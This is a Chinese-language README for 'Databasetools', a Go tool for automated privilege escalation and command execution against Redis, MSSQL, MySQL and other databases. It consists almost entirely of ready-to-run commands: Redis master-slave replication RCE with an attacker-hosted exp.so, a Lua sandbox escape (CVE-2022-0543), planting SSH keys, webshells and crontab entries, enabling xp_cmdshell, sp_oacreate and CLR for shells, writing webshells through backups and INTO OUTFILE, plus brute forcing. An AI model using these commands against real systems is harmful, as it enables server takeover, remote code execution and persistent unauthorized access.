Databasetools
一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis数据库提权、命令执行、爆破以及ssh连接
Install / Use
/learn @Hel10-Web/DatabasetoolsREADME
Redis
连接redis获取sql shell
go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli
主从复制RCE
//Linux
go run .\main.go -redis -rhost 192.168.111.211 -lhost 192.168.1.110 -exec -so exp.so
go run .\main.go -redis -rhost 192.168.111.211 -lhost 192.168.1.110 -exec -console -so exp.so
Lua沙盒绕过命令执行(CVE-2022-0543)
go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console
写公钥
将ssh.txt文件中公钥替换成自己生成的
go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey
写Webshell
go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell
定时任务
需要修改crontab.txt内容
go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab
MSSQL
连接数据库并获取一个sql shell
go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX" -cli
开启xp_cmdshell
go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp
xp_cmdshell获取一个执行系统命令的shell
go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console
xp_cmdshell执行单条系统命令
go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -docmd -cmd "whoami"
开启sp_oacreate
go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp
sp_oacreate获取一个执行系统命令的shell
go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console
sp_oacreate执行单条系统命令
go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -docmd -cmd "whoami"
CLR获取一个执行系统命令的shell
go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console
CLR执行单条系统命令
go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -docmd -cmd "whoami"
log备份写getshell
go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php'
差异备份getshell
go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php'
SSH连接
go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX"
Mysql
连接获取sql shell
go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli
into out file获取webshell
go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\\aaa.php"
